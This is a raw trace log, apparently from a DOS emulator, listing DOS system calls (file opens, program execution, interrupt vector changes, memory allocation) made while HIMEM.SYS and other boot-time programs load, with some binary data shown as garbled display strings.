2018-12-25T11:49:33.438094212Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T11:49:33.448603336Z 66 PC: 91f95 | Move file pointer
2018-12-25T11:49:33.44986984Z 62 PC: 91fc1 | Close file
2018-12-25T11:49:33.451371952Z 75 PC: 91fe0 | Execute program
2018-12-25T11:49:33.461026852Z 98 PC: 916f1 | Get current PSP
2018-12-25T11:49:33.461892558Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T11:49:33.467597727Z 48 PC: c609 | Get DOS version
2018-12-25T11:49:33.46977615Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T11:49:33.471255656Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T11:49:33.472970493Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T11:49:33.475091292Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T11:49:33.477359993Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T11:49:33.480492405Z 61 PC: 91f88 | Open file (See above)
2018-12-25T11:49:33.486637693Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T11:49:33.487847352Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T11:49:33.489665231Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T11:49:33.502515296Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T11:49:33.504861831Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T11:49:33.506505445Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T11:49:33.507471683Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T11:49:33.508488335Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:49:33.509932203Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:49:33.512842247Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T11:49:33.520017262Z 62 PC: 8f8eb | Close file
2018-12-25T11:49:33.521986911Z 62 PC: 8f8f2 | Close file
2018-12-25T11:49:33.523788652Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.525109417Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.527014424Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.531699287Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.532962119Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.534649081Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.536058736Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.537395648Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.539171517Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.540581339Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.541956715Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.543886455Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.545198432Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.546464965Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.547869434Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.549187919Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.550452119Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.551810176Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.574711872Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.576080394Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.577375477Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.579993663Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.581294464Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.582638623Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.586318317Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.587585046Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.588832853Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.590224234Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.591615967Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.593247224Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T11:49:33.598761455Z 62 PC: 8f90e | Close file
2018-12-25T11:49:33.600356699Z 69 PC: 8f915 | Duplicate handle
2018-12-25T11:49:33.601756449Z 69 PC: 8f919 | Duplicate handle
2018-12-25T11:49:33.604467956Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T11:49:33.608949927Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T11:49:33.610149091Z 61 PC: 9387b | Open file (See above)
2018-12-25T11:49:33.615156201Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T11:49:33.616746682Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T11:49:33.61789765Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T11:49:33.619869456Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T11:49:33.621149298Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T11:49:33.622275837Z 72 PC: 8fa02 | Allocate memory
2018-12-25T11:49:33.624075088Z 72 PC: 8fa06 | Allocate memory
2018-12-25T11:49:33.625045461Z 73 PC: 8fa11 | Release memory
2018-12-25T11:49:33.625937773Z 73 PC: 8efea | Release memory
2018-12-25T11:49:33.62728474Z 74 PC: 8f003 | Reallocate memory
2018-12-25T11:49:33.628300053Z 72 PC: 8f054 | Allocate memory
2018-12-25T11:49:33.62930618Z 72 PC: 8f058 | Allocate memory
2018-12-25T11:49:33.630889866Z 73 PC: 8f060 | Release memory
2018-12-25T11:49:33.632230813Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T11:49:33.637619001Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:49:33.641399166Z 66 PC: 8f0ad | Move file pointer
2018-12-25T11:49:33.642784725Z 62 PC: 8f0d1 | Close file
2018-12-25T11:49:33.644368623Z 75 PC: 8f0f2 | Execute program
2018-12-25T11:49:33.666718158Z 80 PC: 12be9 | Set current PSP
2018-12-25T11:49:33.667481931Z 48 PC: 12bee | Get DOS version
2018-12-25T11:49:33.66916413Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T11:49:33.671993769Z 101 PC: 12c74 | Get extended country info
2018-12-25T11:49:33.67378608Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T11:49:33.675458743Z 74 PC: 12cdc | Reallocate memory
2018-12-25T11:49:33.677337695Z 72 PC: 1355d | Allocate memory
2018-12-25T11:49:33.679332426Z 25 PC: 13596 | Get default drive
2018-12-25T11:49:33.681237049Z 71 PC: 135ad | Get current directory
2018-12-25T11:49:33.683755863Z 59 PC: 135ba | Change current directory
2018-12-25T11:49:33.68857783Z 59 PC: 135c8 | Change current directory
2018-12-25T11:49:33.694186034Z 59 PC: 135d3 | Change current directory
2018-12-25T11:49:33.697437075Z 25 PC: 12d13 | Get default drive
2018-12-25T11:49:33.700171526Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T11:49:33.701657862Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T11:49:33.702980165Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:49:33.705404756Z 80 PC: 1301d | Set current PSP
2018-12-25T11:49:33.706734282Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T11:49:33.707833007Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:49:33.708865586Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:49:33.710273301Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T11:49:33.712346307Z 72 PC: 130ec | Allocate memory
2018-12-25T11:49:33.71430875Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T11:49:33.720391471Z 62 PC: 131ba | Close file
2018-12-25T11:49:33.722182069Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T11:49:33.723132225Z 74 PC: 1197c | Reallocate memory
2018-12-25T11:49:33.728814956Z 72 PC: 11991 | Allocate memory
2018-12-25T11:49:33.730247658Z 73 PC: 119b2 | Release memory
2018-12-25T11:49:33.731488148Z 72 PC: 119bd | Allocate memory
2018-12-25T11:49:33.733539802Z 73 PC: 119df | Release memory
2018-12-25T11:49:33.735662488Z 72 PC: 119f5 | Allocate memory
2018-12-25T11:49:33.737249845Z 72 PC: 119fd | Allocate memory